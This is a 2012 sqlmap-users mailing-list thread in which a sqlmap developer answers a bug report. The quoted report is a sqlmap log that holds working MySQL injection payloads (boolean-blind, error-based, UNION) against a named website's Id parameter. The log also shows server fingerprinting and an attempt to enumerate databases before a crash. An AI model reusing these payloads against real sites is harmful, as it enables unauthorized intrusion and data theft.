Hi Pedrito.
This one is very strange as you can see that the stack trace is practically
empty (we can't conclude where the problem occurred). If the problem
persists with the latest update please be so kind and provide me privately
with some more information (e.g. traffic file got by using same command
line and additional -t traffic.txt).
Kind regards,
Miroslav Stampar
On Thu, Jun 21, 2012 at 5:32 AM, Pedrito Perez <0ark1an...@gmail.com> wrote:
>
> sqlmap/1.0-dev - automatic SQL injection and database takeover tool
> http://www.sqlmap.org
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Authors assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:27:50
>
>
> [16:27:50] [INFO] using 'C:\Users\Admin\Desktop\sqlmap\output\
> www.dtvthai.com\session' as session file
>
> [16:27:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
>
> [16:27:50] [INFO] testing connection to the target url
>
> [16:27:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: Id
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: Id=3) AND 4216=4216 AND (6256=6256
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: Id=3) AND (SELECT 2258 FROM(SELECT
> COUNT(*),CONCAT(0x3a656c643a,(SELECT (CASE WHEN (2258=2258) THEN 1 ELSE 0
> END)),0x3a6a6a643a,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3553=3553
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 5 columns
> Payload: Id=3) LIMIT 1,1 UNION ALL SELECT NULL,
> CONCAT(0x3a656c643a,0x5877664a584155517a56,0x3a6a6a643a), NULL, NULL, NULL#
> ---
>
>
> [16:27:54] [INFO] the back-end DBMS is MySQL
> web server operating system: FreeBSD or Linux FreeBSD 7.3
> web application technology: PHP 5.3.2, Apache 2.2.14
> back-end DBMS: MySQL 5.0
>
> [16:27:54] [INFO] fetching database names
>
>
> [16:27:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with the latest development version from the Subversion repository. If
> the exception persists, please send by e-mail to
> sqlmap-users@lists.sourceforge.net the following text and any information
> required to reproduce the bug. The developers will try to reproduce the
> bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.2
> Operating system: nt
> Command line: C:\Users\Admin\Desktop\sqlmap\sqlmap.py -u
> ******************************* --dbs
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
>
> [*] shutting down at 16:27:54
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
